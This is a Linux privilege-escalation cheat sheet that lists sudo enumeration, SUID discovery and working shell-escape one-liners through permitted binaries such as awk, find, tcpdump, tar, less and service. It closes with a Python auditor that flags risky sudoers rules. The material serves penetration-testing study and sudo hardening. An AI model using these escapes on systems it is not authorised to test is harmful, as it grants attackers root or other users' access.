Sudo Trickery

Enumerating Sudo Permissions

$ sudo -l
[sudo] password for joe:
Matching Defaults entries for joe on debian-privesc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User joe may run the following commands on debian-privesc:
    (ALL) (ALL) /usr/bin/crontab -l, /usr/sbin/tcpdump, /usr/bin/apt-get

Find all SUID Binaries

$ find / -perm -4000 2>/dev/null #Find all SUID binaries

Sneaking Commands at the end of a command

Sometimes we can slide a shell command into the end of a permitted command, or into the program's interactive prompt, so the shell inherits sudo's privileges:

$ sudo awk 'BEGIN {system("/bin/sh")}'
$ sudo find /etc -exec sh -i \;
$ sudo tcpdump -n -i lo -G1 -w /dev/null -z ./runme.sh
$ sudo tar c a.tar -I ./runme.sh a
$ sudo ftp
ftp> !/bin/sh                 # shell escape from ftp's interactive prompt
$ sudo less <file>
!<shell_command>              # shell escape from inside less

Running as other user

If a sudoers rule grants NOPASSWD to run a command as another user, `sudo -l` shows it like this:

$ sudo -l
Matching Defaults entries for max on so-simple:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User max may run the following commands on so-simple:
    (steven) NOPASSWD: /usr/sbin/service

Because `service` runs the path it is given relative to /etc/init.d, we can run a shell as steven with the following:

max@box:~$ sudo -u steven /usr/sbin/service ../../bin/bash
steven@box:/$ 
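
As an added defensive check that is not part of this page: a small Python auditor that parses `sudo -l` output like the listings above and flags the rules a hardening review should revisit (NOPASSWD, run-as ALL, and binaries this page shows spawning a shell). The sample input is constructed from the page's own listings, and the set of shell-capable binaries is an assumption limited to what the page names.

```python
import re

# Constructed sample: the `sudo -l` output quoted on this page, with the (steven) NOPASSWD entry appended.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for joe on debian-privesc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User joe may run the following commands on debian-privesc:
    (ALL) (ALL) /usr/bin/crontab -l, /usr/sbin/tcpdump, /usr/bin/apt-get
    (steven) NOPASSWD: /usr/sbin/service
"""

# Assumption: only the binaries this page shows escaping to a shell; a real review would use the full GTFOBins list.
SHELL_ESCAPE_BINARIES = {"awk", "find", "tcpdump", "tar", "ftp", "less", "service"}
ENTRY_RE = re.compile(r"\s*\(([^)]+)\)(?:\s*\(([^)]+)\))?\s*(.*)$")   # (runas_user) [(runas_group)] rest
TAG_RE = re.compile(r"\b(NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC):\s*")


def parse_sudo_l(text):
    """Return (runas_user, nopasswd, command) tuples; the Defaults block before the "User ... may run" header is skipped."""
    entries, in_commands = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True
            continue
        m = ENTRY_RE.match(line) if in_commands and line.strip() else None
        if not m:
            continue
        runas, rest = m.group(1), m.group(3)
        nopasswd = "NOPASSWD:" in rest
        for cmd in TAG_RE.sub("", rest).split(","):   # one rule line may list several commands
            if cmd.strip():
                entries.append((runas, nopasswd, cmd.strip()))
    return entries


def audit(entries):
    """Flag entries a hardening review should revisit, with the reason for each."""
    findings = []
    for runas, nopasswd, cmd in entries:
        binary = cmd.split()[0].rsplit("/", 1)[-1]   # basename of the permitted program
        reasons = []
        if nopasswd:
            reasons.append("NOPASSWD: no password prompt before privilege change")
        if binary in SHELL_ESCAPE_BINARIES:
            reasons.append("binary can spawn a shell, so the rule is equivalent to a shell as the target user")
        if runas == "ALL":
            reasons.append("rule allows running as any user, including root")
        if reasons:
            findings.append((cmd, runas, reasons))
    return findings
```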

GTFOBins

Check GTFOBins (https://gtfobins.github.io), a curated list of Unix binaries that can be used to bypass local security restrictions when run with sudo or with SUID set.
